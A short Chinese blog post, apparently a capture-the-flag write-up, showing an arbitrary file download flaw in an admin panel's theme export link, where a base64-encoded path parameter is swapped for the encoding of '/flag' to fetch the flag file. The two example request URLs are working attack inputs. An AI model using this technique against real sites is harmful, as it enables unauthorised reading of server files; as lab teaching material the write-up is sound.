梦の博客 欢迎来到我的破站
博主 梦の博客
首页
分类
自豪地使用 Typecho 建站搭配使用 🌻Sunny 主题当前在线 1 人
歌曲封面 未知作品
🏠 首页 🏠 生活
音乐单

网站已运行 363 天 21 小时 23 分

Powered by Typecho & Sunny

2 online · 52 ms

Title

任意文件下载漏洞

云梦

·

Article
⚠️ 本文最后更新于2023年05月30日,已经过了334天没有更新,若内容或图片失效,请留言反馈

找到网站后台中的 导出文件按钮:
复制他的下载链接,例如:

♾️ haml 代码:
https://123123.men/admin.php?m=ui&f=downloadtheme&theme=L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2RlZmF1bHQvMS56aXA=

看到一串base64编码: L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2RlZmF1bHQvMS56aXA=
解密出来的结果:
li4btl9a.png
猜测可能存在任意文件下载,将 /flagbase64编码( L2ZsYWc= )加入到url中

♾️ haml 代码:
https://123123.men/admin.php?m=ui&f=downloadtheme&theme=L2ZsYWc=

下载了 flag.zip文件,修改后缀为txt打开拿到flag
li4bzq4w.png

现在已有 0 条评论,0 人点赞
Author
作者
云梦
任意文件下载漏洞
xss跨站漏洞
评论 0
updatexml报错注入
评论 0
sql注入(基础)
评论 0
Comment
发表
搜 索 消 息 足 迹
你还不曾留言过..
你还不曾留下足迹..
博主